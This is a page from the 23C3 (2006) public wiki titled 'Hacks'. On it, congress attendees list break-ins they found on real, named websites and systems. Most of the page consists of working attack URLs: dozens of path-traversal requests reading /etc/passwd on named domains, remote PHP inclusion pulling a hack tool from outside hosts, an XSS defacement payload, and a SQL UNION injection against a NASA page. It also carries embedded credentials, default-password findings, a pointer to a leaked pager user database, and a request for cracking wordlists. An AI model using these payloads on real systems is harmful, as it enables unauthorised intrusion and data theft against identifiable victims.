Hacks

From 23C3 Public Wiki

Jump to: navigation, search

Contents

bad hacks

Remember: No harm to the network!

lol

My work just nullrouted some scriptkiddies :P

CTV Hacks - powered by !eof

Image #1

Image #2

Someone else "hacked" it, too. Dunno who it was. --codec

Why is changing a user defineable text a hack ? lamers! :-) --PoCSascha

Since you are involved! (next time I change the password!) :-D --BugBlue

POC hacks - powered by !eof

  • fixed The Asterisk server of POC doesn't check the external incoming numbers, but puts a 0 in front. If you put 1 zero in from of the local number (0110) the system will change it (not really sure) to 00110 and will later on (maybe at the alcatel hardware) strip the 2 0's Means it will display a local call number
  • maybe fixed the G5 computer of POC has/had a username test with password test
  • not tested when abusing the asterisk server from poc they will block you at mac address level. If you abuse it from outside it will block the router.

reisecluster

Diverse aeh... reiseveranstalter mit einem leichten problem mit sessionids. Des weiteren ist ein iis5 nicht soo die beste idee auf einem windows2000... wie war das? webservices on iis are like rusian roulette with a glock? Egal... fast jedes formular auf den seiten geht ungefiltert an die ms-sql db. Naja,... ne ms-sql db mit den daten SAEMTLICHER seit erstellung der seite mit dem jeweiligen veranstaltern verreisten menschen... waer schon was nettes... Achja... in den profilen auf den seiten kann man PRIMA javascript etc einbasteln.

Achja, man WEISZ um die fehler... schon seit aeh... april.

Favoriten:

rufadmin: 'die seite ist trotzdem sicher'

'oberadmin' aller seiten: 'ich weisz um die fehler, man will aber nicht genug fuer ein beheben der fehler zahlen.'

http://www.abireisen.de/

http://www.frosch-sportreisen.de/

http://www.ruf.de/

http://www.offaehrte.de/

http://www.sfi.de/

Mein favoriet ist aber immernoch http://www.ruf.de/index.html... vorallem... da ich weisz, dass deren admin uwe heiszt... naja... da hat doch nicht einer ne privatseite aufm firmenserver getestet...

NOC hacks - powered by !eof

The printers from the NOC helpdesks didn't have any password in the configuration. This is 'fixed'.

some other hacks

http://hannes:fnord2342@sputnik.congress.ccc.de - Sputnik RFID tracking ;-) http://prosieben.de/club_community/community/index.php?commFile=/foren/channel.php&kat_id=' http://sharp.de/suche/suche.php?search_string=%27

https://wi.hexonet.net/wi/54cd/include.php?http://foobar.servegame.com/ (note: httpS)

Interesting: This Domain Hoster is housing JURIS, the german database of law and order :) Funny: It delivers our content with it's own certificate (remote php inclusion is potentially possible)

MacTechnews.de

Jamba! http://www.jamba.de/jcw/search/searchContent.do?&keywords=&displayname=Gruesse%20vom%2023C3!%20:-)

Even Google! http://www.google.de/search?hl=de&q=Gruesse+vom+23C3

there is a small gallery @flickr ... http://www.flickr.com/photos/75149036@N00/

default password on ssl-vpn: the complete network was open until now. the users can work without problems. the new password was emailed to the admin.
https://www.storage-station.com/

btw. i hope this is ok for the ethik hotline which was not reachable.

Gdata

Bla? ;)

(both "fixed" by now)
http://www.microsoft.se/23C3
http://www.microsoft.dk/23C3

Blub? ;)

http://ich.will-ficken.info http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/ there is more ...

Webklabauter PHP Hacktool remote inclusion :) http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006-mediawiki/images/4/4d/Wkb2.gif&wkb=1# check out: http://metalab.at/wiki/Webklabauter

bild.de *g* http://bild.softonic.de/index.phtml?search=%22%3E%3Cdiv+style%3D%22position%3A+absolute%3B+height%3A+300px%3B+width%3A+300px%3B+top%3A+10px%3B+left%3A+200px%3B+background-color%3A+white%3B+border%3A+3px+solid+black%3B+color%3A+black%3B+padding%3A+10px%3B+font-size%3A+20px%3B%22%3E%3Ccenter%3EGruesse+aus+Berlin%21%3Cbr+%2F%3E%3Cbr+%2F%3E%3Cimg+src%3D%22http%3A%2F%2Fevents.congress.ccc.de%2Fcongress%2F2006-mediawiki%2F%2Fskins%2Ftrustme%2F23c3-logo.png%22%3E%3C%2Fcenter%3E%3C%2Fdiv%3E&body=1&id_section=2&id_section=2&adv_search=0&boolean=1&license=&rank=&date_actualized=

http://www.creativecow.net/show.php?page=/articles/solorio_marco/std_converter_rev/../../../../../../../../../../../etc/passwd

hostmaster@1und1.com, please fix the next 2:
http://www.vgf-online.de/index.php?id=103&no_cache=1&dlpath=etc http://www.browningteam-bayern.de/markt/Rollen/objekte/phpcksec.php?path=/proc/version

even more browsing fun:
http://www.wiwi.uni-bielefeld.de/~fachsch/phpkit/include.php?file=/etc/passwd
http://www.bayernmatrix.de/include.php?file=/etc/passwd
http://www.radio2life.de/include.php?file=/etc/passwd
http://www.safety-cars.de/include.php?file=/etc/passwd
http://www.toshiba-fussball-festival-neuss.de/portal/include.php?file=/etc/passwd
http://www.bindlach-aktionaer.de/include.php?file=/etc/passwd
http://www.wtodda.net/download.php?path=/etc/passwd
http://www.findwhitepapers.com/force-download.php?file=/etc/passwd
http://www.kpccorp.co.kr/catalog/download.php?file=/etc/passwd
http://www.tcrc.ca/download.php?file=/etc/passwd
http://www.lbtreuhand.ch/newstool/news_download.php?file=/etc/passwd
http://www.isn.net/~derekm/cgi-bin/edittag/edittag.pl?file=/etc/passwd
http://lynxx.org/cgi-bin/printsource.cgi?file=/etc/passwd
http://pathfinder.nss-group.com/intranet/download.php?file=/etc/passwd
http://auto-moto-club.homedns.org/script/download.php?ID=passwd&PATH=/etc/ http://innovex.veszprem.hu/onkormanyzatok/download.php?nev=passwd&kep=/etc/passwd
http://www.schaefer-technik.de/download_file.php?name=passwd&file=/etc/passwd
http://www.newtex.com/cgi-bin/prodspec.cgi?filename=/etc/passwd
http://www.msk.or.kr/inc/download.jsp?filePath=/etc/&fileName=passwd
http://www.barohard.co.kr/guide/download.php?filepath=/etc/&filename=passwd
http://sdss.ncdm.uic.edu/viewThroughputFiles.php?file=/etc/passwd
http://www.gwes.tnc.edu.tw/sking.php?action=dir&df_path=/etc/passwd
http://seewald.myftp.org/include.php?file=/etc/passwd
http://www.muensterland.de/include.php?file=/etc/passwd
http://www.neuvm.org/include.php?include=../../../../../../etc/passwd
https://www.sksi.net/filebarn/index.php?rootdir=/etc/&linkdir=/
http://www.montalbano.toscana.it/download.php?nomefile=/etc/passwd
http://www.volleybalspanje.nl/download.php?src=/etc/passwd
http://alt.baumrasen.de/cgi-bin/zitate/zitate.pl?output=/etc/passwd&table=on
http://www.euro-online.org/display.php?file=../../../../../../../etc/passwd&wgid=10&title=Who-can-you-trust---23C3-Berlin&parent=303
http://www.clubsnap.org/display.php?file=../../../../../../../../etc/passwd
http://www.bhncdsb.edu.on.ca/news/display.php?file=../../../../../../../../etc/passwd
http://www.isy-software.de/cgi-bin/show.cgi?z=../../../../../../etc/passwd
http://www.giga-hamburg.de/index.php?file=passwd&folder=../../../../../../../etc
http://cantor.mathematik.uni-ulm.de/m5/index.php?file=../../../../../../../../../etc/passwd
http://www.volvat.dyreklinikk.no/index.php?id=les_mer&file=../../../../../../../etc/passwd
http://www.witze-welt.de/index.php?page=../../../../../../../../../etc/passwd - sehr witzig


Not having a shadow-file is a very bad idea :-/
http://www.ethik.uni-jena.de/02/index.php?file=../../../../../../../../etc/passwd
http://www.lufthansa-cargo.com/download.jsp?file=../../../../../../../../../../../../../../../../../../../../etc/passwd

direkt zum Ausdrucken: http://janine.homedns.org/printDutyRoster.php?file=/etc/passwd
runterladen is komfortabler: http://www.archis.ch/cgi-bin/wPermission.cgi?file=../../../../../../../../../../../../../../../../etc/passwd http://www.ghostwatcher.com/display.php?file=/etc/passwd
http://www.pitu.stm.sp.gov.br/download.php?file=/etc/passwd
http://www.laurentian.ca/sociology/index.php?file=../../../../../../../../etc/passwd
http://smt.dsa.fju.edu.tw/military%20defense/downloads/force-download.php?file=/etc/passwd
http://www.computrols.com/download.php?file=passwd&dir=/etc
http://www.stufr.de/xx/csc/include.php?file=/etc/passwd


http://climate.gsfc.nasa.gov/viewImage.php?id=-1%20UNION%20SELECT%200,0x32336333206f6e676f696e672e2e2e,2,0x3c696d67207372633d2268747470733a2f2f6576656e74732e636f6e67726573732e6363632e64652f636f6e67726573732f323030362d6d6564696177696b692f2f696d616765732f652f65632f323363335f3332307832343070785f32332e6a7067223e,4,5,6,7,8%20/**

Webcam:
Stuttgart Airport ?
http://195.243.185.195/view/index.shtml

oldschool

http://www.angelfire.com/funky/laneyards/ thinking of good old times ...

table bunny hack

http://picpaste.de/owned.JPG who can you trust? ... not us (=, sorry table bunny - awaiting your revenge!

realtime notification?

are you polling the Recent changes function for latest updates on this page and in the wiki? why not install a chat notification plug-in into the wiki, so we can hang out in an IRC channel or even jabber MUC and see in realtime when people edit stuff here? just a thought. --lynX

emessage.de / skyper user database

A sqlite DB with users of the german pager network Skyper / emessage has been seen on various ftp servers. Users can be searched here, the collected DB is e.g. here, if not, use the ftpsearch.


no hack just XSS :)

no hack just a strange checkPassword (having disabled javascript)

http://napoli.ipv6.telscom.ch/TelscomHomeEnvironment

need wordlist

need a wordlist (max. 5<8) characters. plase answer here. many thanks.
md5: check [1] sorry, not a md5 hash list, a normal wordlist with numbers etcpp. look at http://packetstormsecurity.nl/Crackers/wordlists/ or wait ~5 mins and leech my wordlist from tigh.central-services.congress.ccc.de/test/need_wordlist_please/please/